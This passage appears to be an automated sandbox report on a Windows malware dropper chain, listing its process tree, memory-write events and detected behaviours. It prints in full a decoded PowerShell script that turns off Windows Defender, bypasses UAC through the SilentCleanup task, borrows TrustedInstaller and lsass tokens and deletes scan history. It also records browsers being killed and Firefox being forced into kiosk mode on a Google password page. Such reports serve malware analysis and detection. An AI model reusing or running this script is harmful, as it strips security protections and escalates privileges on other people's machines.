pid Process 4636 d14992054b.exe 4636 d14992054b.exe 4636 d14992054b.exe 4636 d14992054b.exe 4636 d14992054b.exe 4636 d14992054b.exe 4636 d14992054b.exe 4636 d14992054b.exe 4636 d14992054b.exe 4636 d14992054b.exe 3804 firefox.exe 3804 firefox.exe 3804 firefox.exe 3804 firefox.exe 3804 firefox.exe 3804 firefox.exe 3804 firefox.exe 3804 firefox.exe 3804 firefox.exe 3804 firefox.exe 3804 firefox.exe 3804 firefox.exe 3804 firefox.exe 3804 firefox.exe 3804 firefox.exe 3804 firefox.exe 3804 firefox.exe 3804 firefox.exe 3804 firefox.exe 3804 firefox.exe 4636 d14992054b.exe 4636 d14992054b.exe 4636 d14992054b.exe 4636 d14992054b.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3488 H3tyh96.exe 3804 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3292 wrote to memory of 3356 3292 bb94330d7bb4d60f1247bf1ab358ac2960823d8289d2016ea8e3489b6919038b.exe 83 PID 3292 wrote to memory of 3356 3292 bb94330d7bb4d60f1247bf1ab358ac2960823d8289d2016ea8e3489b6919038b.exe 83 PID 3292 wrote to memory of 3356 3292 bb94330d7bb4d60f1247bf1ab358ac2960823d8289d2016ea8e3489b6919038b.exe 83 PID 3356 wrote to memory of 1356 3356 F6W49.exe 84 PID 3356 wrote to memory of 1356 3356 F6W49.exe 84 PID 3356 wrote to memory of 1356 3356 F6W49.exe 84 PID 1356 wrote to memory of 2604 1356 s0n62.exe 85 PID 1356 wrote to memory of 2604 1356 s0n62.exe 85 PID 1356 wrote to memory of 2604 1356 s0n62.exe 85 PID 2604 wrote to memory of 2944 2604 1T36h5.exe 86 PID 2604 wrote to memory of 2944 2604 1T36h5.exe 86 PID 2604 wrote to memory of 2944 2604 1T36h5.exe 86 PID 1356 wrote to memory of 3020 1356 s0n62.exe 87 PID 1356 wrote to memory of 3020 1356 s0n62.exe 87 PID 1356 wrote to memory of 3020 1356 s0n62.exe 87 PID 3356 wrote to memory of 1584 3356 F6W49.exe 94 PID 3356 wrote to memory of 1584 3356 F6W49.exe 94 PID 3356 wrote to memory of 1584 3356 F6W49.exe 94 PID 3292 wrote to memory of 4540 3292 bb94330d7bb4d60f1247bf1ab358ac2960823d8289d2016ea8e3489b6919038b.exe 95 PID 3292 wrote to memory of 4540 3292 bb94330d7bb4d60f1247bf1ab358ac2960823d8289d2016ea8e3489b6919038b.exe 95 PID 3292 wrote to memory of 4540 3292 bb94330d7bb4d60f1247bf1ab358ac2960823d8289d2016ea8e3489b6919038b.exe 95 PID 2944 wrote to memory of 2396 2944 skotes.exe 98 PID 2944 wrote to memory of 2396 2944 skotes.exe 98 PID 2944 wrote to memory of 2396 2944 skotes.exe 98 PID 2944 wrote to memory of 3488 2944 skotes.exe 103 PID 2944 wrote to memory of 3488 2944 skotes.exe 103 PID 2944 wrote to memory of 3488 2944 skotes.exe 103 PID 2944 wrote to memory of 3952 2944 skotes.exe 105 PID 2944 wrote to memory of 3952 2944 skotes.exe 105 PID 2944 wrote to memory of 3952 2944 skotes.exe 105 PID 2944 wrote to memory of 3356 2944 skotes.exe 107 PID 2944 wrote to memory of 3356 2944 skotes.exe 107 PID 2944 wrote to memory of 3356 2944 skotes.exe 107 PID 2944 wrote to memory of 4636 2944 skotes.exe 108 PID 2944 wrote to memory of 4636 2944 skotes.exe 108 PID 2944 wrote to memory of 4636 2944 skotes.exe 108 PID 3488 wrote to memory of 4532 3488 H3tyh96.exe 110 PID 3488 wrote to memory of 4532 3488 H3tyh96.exe 110 PID 3488 wrote to memory of 4532 3488 H3tyh96.exe 110 PID 4636 wrote to memory of 3204 4636 d14992054b.exe 112 PID 4636 wrote to memory of 3204 4636 d14992054b.exe 112 PID 4636 wrote to memory of 3204 4636 d14992054b.exe 112 PID 4636 wrote to memory of 1832 4636 d14992054b.exe 117 PID 4636 wrote to memory of 1832 4636 d14992054b.exe 117 PID 4636 wrote to memory of 1832 4636 d14992054b.exe 117 PID 4532 wrote to memory of 4136 4532 powershell.exe 119 PID 4532 wrote to memory of 4136 4532 powershell.exe 119 PID 4532 wrote to memory of 4136 4532 powershell.exe 119 PID 4532 wrote to memory of 388 4532 powershell.exe 120 PID 4532 wrote to memory of 388 4532 powershell.exe 120 PID 4532 wrote to memory of 388 4532 powershell.exe 120 PID 4636 wrote to memory of 4588 4636 d14992054b.exe 122 PID 4636 wrote to memory of 4588 4636 d14992054b.exe 122 PID 4636 wrote to memory of 4588 4636 d14992054b.exe 122 PID 2944 wrote to memory of 4828 2944 skotes.exe 124 PID 2944 wrote to memory of 4828 2944 skotes.exe 124 PID 2944 wrote to memory of 4828 2944 skotes.exe 124 PID 4636 wrote to memory of 4716 4636 d14992054b.exe 125 PID 4636 wrote to memory of 4716 4636 d14992054b.exe 125 PID 4636 wrote to memory of 4716 4636 d14992054b.exe 125 PID 4532 wrote to memory of 1584 4532 powershell.exe 127 PID 4532 wrote to memory of 1584 4532 powershell.exe 127 PID 4532 wrote to memory of 1584 4532 powershell.exe 127 PID 4532 wrote to memory of 3736 4532 powershell.exe 128 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\bb94330d7bb4d60f1247bf1ab358ac2960823d8289d2016ea8e3489b6919038b.exe"C:\Users\Admin\AppData\Local\Temp\bb94330d7bb4d60f1247bf1ab358ac2960823d8289d2016ea8e3489b6919038b.exe"1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3292 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\F6W49.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\F6W49.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3356 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\s0n62.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\s0n62.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1356 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1T36h5.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1T36h5.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Users\Admin\AppData\Local\Temp\1013644001\Z9Pp9pM.exe"C:\Users\Admin\AppData\Local\Temp\1013644001\Z9Pp9pM.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2396
-
-
C:\Users\Admin\AppData\Local\Temp\1013675001\H3tyh96.exe"C:\Users\Admin\AppData\Local\Temp\1013675001\H3tyh96.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3488 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc @ ( e c h o   o f f % ) [ 1 ]  
 s p   ' H K C U : \ V o l a t i l e   E n v i r o n m e n t '   ' T o g g l e D e f e n d e r '   @ '  
 i f   ( $ ( s c . e x e   q c   w i n d e f e n d )   - l i k e   ' * T O G G L E * ' )   { $ T O G G L E = 7 ; $ K E E P = 6 ; $ A = ' E n a b l e ' ; $ S = ' O F F ' } e l s e { $ T O G G L E = 6 ; $ K E E P = 7 ; $ A = ' D i s a b l e ' ; $ S = ' O N ' }  
  
 i f   ( $ e n v : 1   - n e   6   - a n d   $ e n v : 1   - n e   7 )   {   $ e n v : 1 = $ T O G G L E   }  
  
 s t a r t   c m d   - a r g s   ' / d / r   S e c u r i t y H e a l t h S y s t r a y   &   " % P r o g r a m F i l e s % \ W i n d o w s   D e f e n d e r \ M S A S C u i L . e x e " '   - w i n   1  
  
 $ n o t i f = ' H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ N o t i f i c a t i o n s \ S e t t i n g s \ W i n d o w s . S y s t e m T o a s t . S e c u r i t y A n d M a i n t e n a n c e '  
 n i   $ n o t i f   - e a   0 | o u t - n u l l ;   r i   $ n o t i f . r e p l a c e ( ' S e t t i n g s ' , ' C u r r e n t ' )   - R e c u r s e   - F o r c e   - e a   0  
 s p   $ n o t i f   E n a b l e d   0   - T y p e   D w o r d   - F o r c e   - e a   0 ;   i f   ( $ T O G G L E   - e q   7 )   { r p   $ n o t i f   E n a b l e d   - F o r c e   - e a   0 }  
  
 $ t s = N e w - O b j e c t   - C o m O b j e c t   ' S c h e d u l e . S e r v i c e ' ;   $ t s . C o n n e c t ( ) ;   $ b a f f l i n g = $ t s . G e t F o l d e r ( ' \ M i c r o s o f t \ W i n d o w s \ D i s k C l e a n u p ' )  
 $ b p a s s = $ b a f f l i n g . G e t T a s k ( ' S i l e n t C l e a n u p ' ) ;   $ f l a w = $ b p a s s . D e f i n i t i o n  
  
 $ u = 0 ; $ w = w h o a m i   / g r o u p s ; i f ( $ w - l i k e ' * 1 - 5 - 3 2 - 5 4 4 * ' ) { $ u = 1 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 2 2 8 8 * ' ) { $ u = 2 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 6 3 8 4 * ' ) { $ u = 3 }  
  
 $ r = [ c h a r ] 1 3 ;   $ n f o = [ c h a r ] 3 9 + $ r + '   ( \       / ) ' + $ r + ' (   *   .   *   )     A   l i m i t e d   a c c o u n t   p r o t e c t s   y o u   f r o m   U A C   e x p l o i t s ' + $ r + '         ` ` ` ' + $ r + [ c h a r ] 3 9  
 $ s c r i p t = ' - n o p   - w i n   1   - c   &   { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; $ A v e Y o = ' + $ n f o + ' ; $ e n v : 1 = ' + $ e n v : 1 ;   $ e n v : _ _ C O M P A T _ L A Y E R = ' I n s t a l l e r '  
 $ s c r i p t + = ' ; i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r ) } ' ;   $ c m d = ' p o w e r s h e l l   ' + $ s c r i p t  
  
 i f   ( $ u   - e q   0 )   {  
     s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k  
 }  
 i f   ( $ u   - e q   1 )   {  
     i f   ( $ f l a w . A c t i o n s . I t e m ( 1 ) . P a t h   - i n o t l i k e   ' * w i n d i r * ' ) { s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k }  
     s p   h k c u : \ e n v i r o n m e n t   w i n d i r   $ ( ' p o w e r s h e l l   ' + $ s c r i p t + '   # ' )  
     $ z = $ b p a s s . R u n E x ( $ n u l l , 2 , 0 , $ n u l l ) ;   $ w a i t = 0 ;   w h i l e ( $ b p a s s . S t a t e   - g t   3   - a n d   $ w a i t   - l t   1 7 ) { s l e e p   - m   1 0 0 ;   $ w a i t + = 0 . 1 }  
     i f ( g p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ) { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 } ; b r e a k  
 }  
 i f   ( $ u   - e q   2 )   {  
     $ A = [ A p p D o m a i n ] : : C u r r e n t D o m a i n . " D e f ` i n e D y n a m i c A s s e m b l y " ( 1 , 1 ) . " D e f ` i n e D y n a m i c M o d u l e " ( 1 ) ; $ D = @ ( ) ; 0 . . 5 | % { $ D + = $ A . " D e f ` i n e T y p e " ( ' A ' + $ _ ,  
     1 1 7 9 9 1 3 , [ V a l u e T y p e ] ) }   ; 4 , 5 | % { $ D + = $ D [ $ _ ] . " M a k ` e B y R e f T y p e " ( ) }   ; $ I = [ I n t 3 2 ] ; $ J = " I n t ` P t r " ; $ P = $ I . m o d u l e . G e t T y p e ( " S y s t e m . $ J " ) ;   $ F = @ ( 0 )  
     $ F + = ( $ P , $ I , $ P ) , ( $ I , $ I , $ I , $ I , $ P , $ D [ 1 ] ) , ( $ I , $ P , $ P , $ P , $ I , $ I , $ I , $ I , $ I , $ I , $ I , $ I , [ I n t 1 6 ] , [ I n t 1 6 ] , $ P , $ P , $ P , $ P ) , ( $ D [ 3 ] , $ P ) , ( $ P , $ P , $ I , $ I )  
     $ S = [ S t r i n g ] ;   $ 9 = $ D [ 0 ] . " D e f ` i n e P I n v o k e M e t h o d " ( ' C r e a t e P r o c e s s ' , " k e r n e l ` 3 2 " , 8 2 1 4 , 1 , $ I , @ ( $ S , $ S , $ I , $ I , $ I , $ I , $ I , $ S , $ D [ 6 ] , $ D [ 7 ] ) , 1 , 4 )  
     1 . . 5 | % { $ k = $ _ ; $ n = 1 ; $ F [ $ _ ] | % { $ 9 = $ D [ $ k ] . " D e f ` i n e F i e l d " ( ' f ' + $ n + + , $ _ , 6 ) } } ; $ T = @ ( ) ; 0 . . 5 | % { $ T + = $ D [ $ _ ] . " C r ` e a t e T y p e " ( ) ; $ Z = [ u i n t p t r ] : : s i z e  
     n v   ( ' T ' + $ _ ) ( [ A c t i v a t o r ] : : C r e a t e I n s t a n c e ( $ T [ $ _ ] ) ) } ;   $ H = $ I . m o d u l e . G e t T y p e ( " S y s t e m . R u n t i m e . I n t e r o p ` S e r v i c e s . M a r ` s h a l " ) ;  
     $ W P = $ H . " G e t ` M e t h o d " ( " W r i t e $ J " , [ t y p e [ ] ] ( $ J , $ J ) ) ;   $ H G = $ H . " G e t ` M e t h o d " ( " A l l o c H ` G l o b a l " , [ t y p e [ ] ] ' i n t 3 2 ' ) ;   $ v = $ H G . i n v o k e ( $ n u l l , $ Z )  
     ' T r u s t e d I n s t a l l e r ' , ' l s a s s ' | % { i f ( ! $ p n ) { n e t 1   s t a r t   $ _   2 > & 1   > $ n u l l ; $ p n = [ D i a g n o s t i c s . P r o c e s s ] : : G e t P r o c e s s e s B y N a m e ( $ _ ) [ 0 ] ; } }  
     $ W P . i n v o k e ( $ n u l l , @ ( $ v , $ p n . H a n d l e ) ) ;   $ S Z = $ H . " G e t ` M e t h o d " ( " S i z e O f " , [ t y p e [ ] ] ' t y p e ' ) ;   $ T 1 . f 1 = 1 3 1 0 7 2 ;   $ T 1 . f 2 = $ Z ;   $ T 1 . f 3 = $ v ;   $ T 2 . f 1 = 1  
     $ T 2 . f 2 = 1 ; $ T 2 . f 3 = 1 ; $ T 2 . f 4 = 1 ; $ T 2 . f 6 = $ T 1 ; $ T 3 . f 1 = $ S Z . i n v o k e ( $ n u l l , $ T [ 4 ] ) ; $ T 4 . f 1 = $ T 3 ; $ T 4 . f 2 = $ H G . i n v o k e ( $ n u l l , $ S Z . i n v o k e ( $ n u l l , $ T [ 2 ] ) )  
     $ H . " G e t ` M e t h o d " ( " S t r u c t u r e T o ` P t r " , [ t y p e [ ] ] ( $ D [ 2 ] , $ J , ' b o o l e a n ' ) ) . i n v o k e ( $ n u l l , @ ( ( $ T 2 - a s   $ D [ 2 ] ) , $ T 4 . f 2 , $ f a l s e ) ) ; $ w i n d o w = 0 x 0 E 0 8 0 6 0 0  
     $ 9 = $ T [ 0 ] . " G e t ` M e t h o d " ( ' C r e a t e P r o c e s s ' ) . I n v o k e ( $ n u l l , @ ( $ n u l l , $ c m d , 0 , 0 , 0 , $ w i n d o w , 0 , $ n u l l , ( $ T 4 - a s   $ D [ 4 ] ) , ( $ T 5 - a s   $ D [ 5 ] ) ) ) ;   b r e a k  
 }  
  
 $ w d p = ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '  
 '   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s ' , ' \ U X   C o n f i g u r a t i o n ' , ' \ M p E n g i n e ' , ' \ S p y n e t ' , ' \ R e a l - T i m e   P r o t e c t i o n '   | %   { n i   ( $ w d p + $ _ ) - e a   0 | o u t - n u l l }  
  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ S y s t e m '   E n a b l e S m a r t S c r e e n   0   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 n e t 1   s t o p   w i n d e f e n d  
 s c . e x e   c o n f i g   w i n d e f e n d   d e p e n d =   R p c S s - T O G G L E  
 k i l l   - N a m e   M p C m d R u n   - F o r c e   - e a   0  
 s t a r t   ( $ e n v : P r o g r a m F i l e s + ' \ W i n d o w s   D e f e n d e r \ M p C m d R u n . e x e ' )   - A r g   ' - D i s a b l e S e r v i c e '   - w i n   1  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ m p e n g i n e d b . d b ' )   - F o r c e   - e a   0                       # #   C o m m e n t e d   =   k e e p   s c a n   h i s t o r y  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ H i s t o r y \ S e r v i c e ' )   - R e c u r s e   - F o r c e   - e a   0  
 ' @   - F o r c e   - e a   0 ;   i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r )  
 # - _ - # 7⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4532 -
C:\Windows\SysWOW64\sc.exe"C:\Windows\system32\sc.exe" qc windefend8⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4136
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"8⤵
- System Location Discovery: System Language Discovery
PID:388
-
-
C:\Windows\SysWOW64\whoami.exe"C:\Windows\system32\whoami.exe" /groups8⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1584
-
-
C:\Windows\SysWOW64\net1.exe"C:\Windows\system32\net1.exe" start TrustedInstaller8⤵
- System Location Discovery: System Language Discovery
PID:3736
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3488 -s 29087⤵
- Program crash
PID:2384
-
-
-
C:\Users\Admin\AppData\Local\Temp\1013745001\b0ca257f9b.exe"C:\Users\Admin\AppData\Local\Temp\1013745001\b0ca257f9b.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3952
-
-
C:\Users\Admin\AppData\Local\Temp\1013746001\f8d272256d.exe"C:\Users\Admin\AppData\Local\Temp\1013746001\f8d272256d.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3356
-
-
C:\Users\Admin\AppData\Local\Temp\1013747001\d14992054b.exe"C:\Users\Admin\AppData\Local\Temp\1013747001\d14992054b.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4636 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3204
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1832
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4588
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4716
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3740
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:4100
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3804 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2016 -parentBuildID 20240401114208 -prefsHandle 1932 -prefMapHandle 1924 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ba64f23b-4c86-4374-887c-94697e4c4147} 3804 "\\.\pipe\gecko-crash-server-pipe.3804" gpu9⤵PID:2280
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2504 -parentBuildID 20240401114208 -prefsHandle 2472 -prefMapHandle 2468 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e00f1bb6-05cc-41ec-a547-36f4e6651453} 3804 "\\.\pipe\gecko-crash-server-pipe.3804" socket9⤵PID:4128
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3424 -childID 1 -isForBrowser -prefsHandle 3416 -prefMapHandle 3412 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2b5453f3-a54c-49ab-9bbe-ce3e78f3291e} 3804 "\\.\pipe\gecko-crash-server-pipe.3804" tab9⤵PID:696
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3784 -childID 2 -isForBrowser -prefsHandle 3808 -prefMapHandle 3804 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7e102057-1b3f-4311-894c-6c699e2f92dd} 3804 "\\.\pipe\gecko-crash-server-pipe.3804" tab9⤵PID:2884
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4416 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4372 -prefMapHandle 4368 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {03e537e7-7b82-4bd3-b3d8-201d403f44ea} 3804 "\\.\pipe\gecko-crash-server-pipe.3804" utility9⤵
- Checks processor information in registry
PID:6212
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5124 -childID 3 -isForBrowser -prefsHandle 5036 -prefMapHandle 5116 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2c34ae08-243c-44a6-b7fb-5f50b7408c24} 3804 "\\.\pipe\gecko-crash-server-pipe.3804" tab9⤵PID:6908
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5412 -childID 4 -isForBrowser -prefsHandle 5368 -prefMapHandle 5388 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9f56dd9c-20ca-49d6-a92f-288e1259146b} 3804 "\\.\pipe\gecko-crash-server-pipe.3804" tab9⤵PID:6940
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5600 -childID 5 -isForBrowser -prefsHandle 5608 -prefMapHandle 5612 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c5b9fd41-3428-4320-850c-6c6c041b62d9} 3804 "\\.\pipe\gecko-crash-server-pipe.3804" tab9⤵PID:6952
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1013748001\11f1d05df2.exe"C:\Users\Admin\AppData\Local\Temp\1013748001\11f1d05df2.exe"6⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4828
-
-
C:\Users\Admin\AppData\Local\Temp\1013749001\76a222939c.exe"C:\Users\Admin\AppData\Local\Temp\1013749001\76a222939c.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1612 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 7647⤵
- Program crash
PID:5800
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2b3011.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2b3011.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
